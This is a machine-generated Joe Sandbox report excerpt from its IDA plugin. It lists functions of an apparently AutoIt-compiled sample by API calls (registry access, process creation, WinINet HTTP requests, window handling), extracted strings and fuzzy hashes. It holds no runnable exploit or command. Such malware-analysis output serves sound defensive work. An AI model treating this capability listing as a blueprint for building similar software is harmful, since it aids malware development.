CharUpperBuffW.USER32(?,?), ref: 0133C9B5
_wcslen.LIBCMT ref: 0133C9F1
_wcslen.LIBCMT ref: 0133CA68
_wcslen.LIBCMT ref: 0133CA9E
_wcslen.LIBCMT ref: 0133CAF9
_wcslen.LIBCMT ref: 0133CB2F
_wcslen.LIBCMT ref: 0133CB7F

Strings

HKEY_USERS, xrefs: 0133CBDF
HKLM, xrefs: 0133CA98, 0133CA9D
HKCC, xrefs: 0133CBAC
HKEY_CURRENT_CONFIG, xrefs: 0133CB79, 0133CB7E
HKEY_CURRENT_USER, xrefs: 0133CBBD
HKCR, xrefs: 0133CB29, 0133CB2E
HKCU, xrefs: 0133CBCE
HKU, xrefs: 0133CBF0
HKEY_CLASSES_ROOT, xrefs: 0133CAF3, 0133CAF8
HKEY_LOCAL_MACHINE, xrefs: 0133CA62, 0133CA67

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 9a3714e9fa231c20cce01e182a8c330cb660eac8c0cc78d03848594ab968d604
Instruction ID: 8361d7adeed25dd3ea9d938df64a9092643fbfe6e9b7786d1a497bcf8d43387e
Opcode Fuzzy Hash: 9a3714e9fa231c20cce01e182a8c330cb660eac8c0cc78d03848594ab968d604
Instruction Fuzzy Hash: 5F7112326101AB8BDF21DE7CCD405FE3395AFE065CF11211AE852B7285EA35CD46C3A8

Uniqueness

Uniqueness Score: -1.00%

Function 0134833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0134835A
_wcslen.LIBCMT ref: 0134836E
_wcslen.LIBCMT ref: 01348391
_wcslen.LIBCMT ref: 013483B4
LoadImageW.USER32 ref: 013483F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,01345BF2), ref: 0134844E
LoadImageW.USER32 ref: 01348487
LoadImageW.USER32 ref: 013484CA
LoadImageW.USER32 ref: 01348501
FreeLibrary.KERNEL32(?), ref: 0134850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0134851D
DestroyIcon.USER32(?,?,?,?,?,01345BF2), ref: 0134852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 01348549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 01348555

Strings

.icl, xrefs: 01348368
.dll, xrefs: 013483AB
.exe, xrefs: 01348388

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 842d679c9d665c4ccfb07ee66a900c7fd637231dd7802a3f2fad9d2fc425a97e
Instruction ID: 95ab39868696af78514cf6991fa67b74dbdd2266aa9ccbca403007afb6a37db8
Opcode Fuzzy Hash: 842d679c9d665c4ccfb07ee66a900c7fd637231dd7802a3f2fad9d2fc425a97e
Instruction Fuzzy Hash: 1061BF71910219FBEB24DFA8CC85BFE77ACBB04725F104589F915E61D0DB74AA80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012B7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#pragma compile, xrefs: 012B77D3
#include, xrefs: 012B7847
#comments-start, xrefs: 012B785F, 012B78B1
", xrefs: 012F5153
Unterminated group of comments, xrefs: 012F528C
#ce, xrefs: 012B78ED
', xrefs: 012F5169
#notrayicon, xrefs: 012B77E7
Bad directive syntax error, xrefs: 012F519A
#include-once, xrefs: 012B782F
#requireadmin, xrefs: 012B77FF
#comments-end, xrefs: 012B78D9
#OnAutoItStartRegister, xrefs: 012B7817
#cs, xrefs: 012B7873, 012B78C5
Cannot parse #include, xrefs: 012F5279

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 14128353d9be22f438d1c0b507120aa2e8306ad68501d48e52ef54aab8f47179
Instruction ID: ee37aa308535adacecce716cc32ccb185b3a2cd639b8a94a3080b6f35333c1b4
Opcode Fuzzy Hash: 14128353d9be22f438d1c0b507120aa2e8306ad68501d48e52ef54aab8f47179
Instruction Fuzzy Hash: 3381F771620207BBEB25AF64CC81FFF7BA8AF65744F044028FB05AA191E770E551DB91

Uniqueness

Uniqueness Score: -1.00%

Function 012D00C6 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 012D00C6

Part of subcall function 012D00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(P=r,00000FA0,822F34C3,?,?,?,?,012F23B3,000000FF), ref: 012D011C
Part of subcall function 012D00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,012F23B3,000000FF), ref: 012D0127
Part of subcall function 012D00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,012F23B3,000000FF), ref: 012D0138
Part of subcall function 012D00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable,?,?,?,?,012F23B3,000000FF), ref: 012D014E
Part of subcall function 012D00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS,?,?,?,?,012F23B3,000000FF), ref: 012D015C
Part of subcall function 012D00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable,?,?,?,?,012F23B3,000000FF), ref: 012D016A
Part of subcall function 012D00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 012D0195
Part of subcall function 012D00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 012D01A0

___scrt_fastfail.LIBCMT ref: 012D00E7

Part of subcall function 012D00A3: __onexit.LIBCMT ref: 012D00A9

Strings

SleepConditionVariableCS, xrefs: 012D0154
api-ms-win-core-synch-l1-2-0.dll, xrefs: 012D0122
WakeAllConditionVariable, xrefs: 012D0162
kernel32.dll, xrefs: 012D0133
P=r, xrefs: 012D0117
InitializeConditionVariable, xrefs: 012D0148

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$P=r$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-3144100665
Opcode ID: 8d9e875da68efa5bbd1f0d0063f740dd40db957611572ad07ca6fb9845786876
Instruction ID: ec805c1a99625dcd3bfab5dfc8b4c6dd02b761c20d1b2bb276d4a4bf894fe92c
Opcode Fuzzy Hash: 8d9e875da68efa5bbd1f0d0063f740dd40db957611572ad07ca6fb9845786876
Instruction Fuzzy Hash: 76210832A657126BE7356BB9E805B6E77DCEB05F65F04012DFA01E2354DF70E8008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 01315A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 01315A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 01315A40
SetWindowTextW.USER32 ref: 01315A57
GetDlgItem.USER32(?,000003EA), ref: 01315A6C
SetWindowTextW.USER32 ref: 01315A72
GetDlgItem.USER32(?,000003E9), ref: 01315A82
SetWindowTextW.USER32 ref: 01315A88
SendDlgItemMessageW.USER32 ref: 01315AA9
SendDlgItemMessageW.USER32 ref: 01315AC3
GetWindowRect.USER32(?,?), ref: 01315ACC
_wcslen.LIBCMT ref: 01315B33
SetWindowTextW.USER32 ref: 01315B6F
GetDesktopWindow.USER32 ref: 01315B75
GetWindowRect.USER32(00000000), ref: 01315B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 01315BD3
GetClientRect.USER32 ref: 01315BE0
PostMessageW.USER32 ref: 01315C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 01315C2F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 7591b540d618194ce3e9581569fec3c951213c338a3d48b376c08a08f375ad0c
Instruction ID: 92d205261ed7ab6b9a61624b6f1f97f9a8e89056289ec9556456cf8d4e02d63b
Opcode Fuzzy Hash: 7591b540d618194ce3e9581569fec3c951213c338a3d48b376c08a08f375ad0c
Instruction Fuzzy Hash: DF718E31900709AFDB24DFA8CE85AAEBBF9FF88718F108518E542A2594DB75F900CF50

Uniqueness

Uniqueness Score: -1.00%

Function 013130F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0131318D
_wcslen.LIBCMT ref: 013131F8

Strings

INSTANCE, xrefs: 01313453
TEXT, xrefs: 0131347C
NAME, xrefs: 01313335, 01313346
CLASSNN, xrefs: 013131F3, 01313204
REGEXPCLASS, xrefs: 01313255, 01313266
CLASS, xrefs: 01313188, 013131A5

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 27bc8d43ab1aa5a956031236fae39076318f442b5027afd63499567562e06adc
Instruction ID: 8f66f129aa50a01b771e57a50736b4cdca3c5f3f5a909d705dbb43534f0d0321
Opcode Fuzzy Hash: 27bc8d43ab1aa5a956031236fae39076318f442b5027afd63499567562e06adc
Instruction Fuzzy Hash: 47E1E332A00116EBDF2D9FACC4816FDBBB4BF54768F148219D556B7244DF30A989CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013244C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000), ref: 01324527
_wcslen.LIBCMT ref: 0132453B
_wcslen.LIBCMT ref: 01324599
_wcslen.LIBCMT ref: 013245F4
_wcslen.LIBCMT ref: 0132463F
_wcslen.LIBCMT ref: 013246A7

Part of subcall function 012CF9F2: _wcslen.LIBCMT ref: 012CF9FD

GetDriveTypeW.KERNEL32(?,01376BF0,00000061), ref: 01324743

Strings

fixed, xrefs: 01324635, 0132463A
cdrom, xrefs: 0132458F, 01324594
removable, xrefs: 013245EA, 013245EF
unknown, xrefs: 01324708
ramdisk, xrefs: 013246F1
all, xrefs: 01324531, 01324536
network, xrefs: 0132469D, 013246A2

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 1f567bca0ecff38ff3a0c47e3b106c1d36ea82aad9d34e0945384fddbe292796
Instruction ID: 02f4e81dd7ab40acd49e9c2896589e98c48ce019d711e7c516e98de8f0b99a88
Opcode Fuzzy Hash: 1f567bca0ecff38ff3a0c47e3b106c1d36ea82aad9d34e0945384fddbe292796
Instruction Fuzzy Hash: DBB1E2716083229FC720EF2DC890ABAB7E5BFA5768F50491DF5A687291D730D844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01346CD9 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 01346DEB

Part of subcall function 012B6B57: _wcslen.LIBCMT ref: 012B6B6A

CreateWindowExW.USER32 ref: 01346E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 01346E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01346E94
DestroyWindow.USER32 ref: 01346EB5
CreateWindowExW.USER32 ref: 01346EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01346EFD
GetDesktopWindow.USER32 ref: 01346F16
GetWindowRect.USER32(00000000), ref: 01346F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 01346F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 01346F4D

Part of subcall function 012C9944: GetWindowLongW.USER32(?,000000EB), ref: 012C9952

Strings

0, xrefs: 01346D98
tooltips_class32, xrefs: 01346E58, 01346EDD
8lr, xrefs: 01346D0F, 01346DCF, 01346DF1, 01346E04

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$8lr$tooltips_class32
API String ID: 2429346358-4012738329
Opcode ID: d9686d0e1df83b976b11b292697a3b7c1e8d0dc961cc5dc1b7a5862471ba5f5f
Instruction ID: e50adb8a9cf61bfad77aba9b82cac2f9e602e8e7831eb5dc9bbc561700519d76
Opcode Fuzzy Hash: d9686d0e1df83b976b11b292697a3b7c1e8d0dc961cc5dc1b7a5862471ba5f5f
Instruction Fuzzy Hash: 3F716BB4104345AFEB21CF1CC855AAABBE9FB89308F44441DFA9987261C774B94ACB11

Uniqueness

Uniqueness Score: -1.00%

Function 0134911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 012C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 012C9BB2

DragQueryPoint.SHELL32(?,?), ref: 01349147

Part of subcall function 01347674: ClientToScreen.USER32(?,?), ref: 0134769A
Part of subcall function 01347674: GetWindowRect.USER32(?,?), ref: 01347710
Part of subcall function 01347674: PtInRect.USER32(?,?,01348B89), ref: 01347720

SendMessageW.USER32(?,000000B0,?,?), ref: 013491B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 013491BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 013491DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 01349225
SendMessageW.USER32(?,000000B0,?,?), ref: 0134923E
SendMessageW.USER32(?,000000B1,?,?), ref: 01349255
SendMessageW.USER32(?,000000B1,?,?), ref: 01349277
DragFinish.SHELL32(?), ref: 0134927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 01349371

Strings

@GUI_DRAGID, xrefs: 013492E9
@GUI_DRAGFILE, xrefs: 01349320
8lr, xrefs: 0134917D, 013491EA
@GUI_DROPID, xrefs: 0134929E

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: 8lr$@GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-1421766851
Opcode ID: ea390f3fade6d9730227d6f8f20468dbf0d294972bec80bd02ce1c1281aba463
Instruction ID: a70e219457604b4795b1f4c5498888cd12b89725c0b55b4128f54d6da9b7904d
Opcode Fuzzy Hash: ea390f3fade6d9730227d6f8f20468dbf0d294972bec80bd02ce1c1281aba463
Instruction Fuzzy Hash: 9E615E71108305AFD711DF64D884DAFBBE8FF99754F00091EF695932A0DB70AA49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0132C476 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0132C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0132C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0132C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0132C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0132C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0132C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0132C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0132C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0132C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0132C5F0
InternetCloseHandle.WININET(00000000), ref: 0132C5FB

Strings

91ZABQXgvBvBou3vbt, xrefs: 0132C490
, xrefs: 0132C575

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID: $91ZABQXgvBvBou3vbt
API String ID: 3800310941-1602716617
Opcode ID: e1b05deb1b67374d2fcd09688d9513346e5a5b8e400b51ffc92d2297f892976c
Instruction ID: 533292901f78779275d4568305a1ca75a805c2c171e8f3d0a2293f108a6811c5
Opcode Fuzzy Hash: e1b05deb1b67374d2fcd09688d9513346e5a5b8e400b51ffc92d2297f892976c
Instruction Fuzzy Hash: 1B516AB4500619BFEB21AFA5C988AAF7FFCFF08758F106419F94596600DB35EA04DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0133AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0133B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0133B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0133B1D4
_wcslen.LIBCMT ref: 0133B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0133B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0133B236
_wcslen.LIBCMT ref: 0133B332

Part of subcall function 013205A7: GetStdHandle.KERNEL32(000000F6), ref: 013205C6

_wcslen.LIBCMT ref: 0133B34B
_wcslen.LIBCMT ref: 0133B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0133B3B6
GetLastError.KERNEL32(00000000), ref: 0133B407
CloseHandle.KERNEL32(?), ref: 0133B439
CloseHandle.KERNEL32(00000000), ref: 0133B44A
CloseHandle.KERNEL32(00000000), ref: 0133B45C
CloseHandle.KERNEL32(00000000), ref: 0133B46E
CloseHandle.KERNEL32(?), ref: 0133B4E3

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: ff965ab858afaaa35d1bf43d74dd1cf69d5817613bebc85134a4d8796f4c7e95
Instruction ID: 44a87ae1efc121cdfec97f7f79e29f4dc8a896e3b8408ff5a662e7be29e55151
Opcode Fuzzy Hash: ff965ab858afaaa35d1bf43d74dd1cf69d5817613bebc85134a4d8796f4c7e95
Instruction Fuzzy Hash: 9EF1BB316043419FDB24EF28C880B6EFBE5AFC4758F14855DE99A9B2A5CB30EC44CB56

Uniqueness

Uniqueness Score: -1.00%

Function 012B326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(01381990), ref: 012F2F8D
GetMenuItemCount.USER32(01381990), ref: 012F303D
GetCursorPos.USER32(?), ref: 012F3081
SetForegroundWindow.USER32(00000000), ref: 012F308A
TrackPopupMenuEx.USER32 ref: 012F309D
PostMessageW.USER32 ref: 012F30A9

Strings

0, xrefs: 012B327D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 423416651714f30d22e6c19767362927e5c8d040c19b6a1a149734cf3d55d112
Instruction ID: dbbf69cc3efea4195f339fb83b4f844b6d9e159889ce6b2fb0f3729715861d8e
Opcode Fuzzy Hash: 423416651714f30d22e6c19767362927e5c8d040c19b6a1a149734cf3d55d112
Instruction Fuzzy Hash: 4D71B571665206BBFB259F69CC89FAAFF68FF05364F10421AF7156A1D0C7B1A810CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012C8BCD Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 012C8F62: InvalidateRect.USER32(?,00000000,00000001), ref: 012C8FC5

DestroyWindow.USER32 ref: 012C8C81
KillTimer.USER32 ref: 012C8D1B
DestroyAcceleratorTable.USER32 ref: 01306973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,012C8BBA,00000000,?), ref: 013069A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,012C8BBA,00000000,?), ref: 013069B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,012C8BBA,00000000), ref: 013069D4
DeleteObject.GDI32(00000000), ref: 013069E6

Strings

8lr, xrefs: 012C8C06

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

